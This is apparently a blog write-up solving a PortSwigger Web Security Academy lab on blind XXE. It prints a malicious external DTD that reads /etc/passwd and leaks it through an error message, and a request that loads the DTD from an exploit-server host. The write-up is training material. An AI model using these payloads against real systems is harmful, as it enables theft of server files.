Lab: Exploiting blind XXE to retrieve data via error messages

Posted on | Post modified | In |

Lab: Exploiting blind XXE to retrieve data via error messages

tags: Portswigger Web Security Academy Web
  • Description: This lab has a “Check stock” feature that parses XML input but does not display the result.
  • Goal: To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file. The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.

Recon

This is very similar to the previous lab(Exploiting blind XXE to exfiltrate data using a malicious external DTD)

  1. Complete Malicious Server Payload and Store 
    1
    2
    3
    4
    		 
     <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
 %eval;
 %exfil;

  2. Complete Intercept Packet Payload Intercept the packet that you click Check stock button in arbitrary product page. Copy and paste your malicious server URL to YOUR-DTD-URL, e.g. https://exploit-{YOUR-RANDOM-URL}.exploit-server.net/exploit

    1
    		 
     <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
  3. Send packet!!!

Exp

:::spoiler Malicious Server Payload

1
2
3
4
 
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

::: :::spoiler Intercept Packet Payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0ad100a2040f8d8e821cce250179002c.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
    <productId>
        1
    </productId>
    <storeId>
        1
    </storeId>
</stockCheck>

:::

:::spoiler Success Screenshot

:::